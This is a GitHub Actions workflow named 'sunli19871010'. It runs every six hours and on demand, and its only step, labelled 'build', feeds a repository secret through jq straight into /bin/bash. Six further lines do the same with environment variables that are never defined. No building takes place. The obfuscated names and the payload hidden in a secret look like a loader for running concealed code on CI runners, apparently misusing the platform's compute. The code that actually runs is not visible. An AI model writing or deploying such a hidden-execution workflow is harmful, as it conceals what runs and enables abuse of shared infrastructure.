name: sunli19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '4 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sunli19871010
        env:
          on5: ${{ secrets.on5 }}
        run: |
          echo $on5 | jq -r .porgz3808 | /bin/bash
          echo $fjhnz4261 | jq -r .vj07 | /bin/bash
          echo $oma876 | jq -r .mt9166 | /bin/bash
          echo $gpv5669 | jq -r .i7175 | /bin/bash
          echo $bvevp75431 | jq -r .jz487 | /bin/bash
          echo $zoje9235 | jq -r .ltlfs13285 | /bin/bash
          echo $uxge68775 | jq -r .qlctt2 | /bin/bash

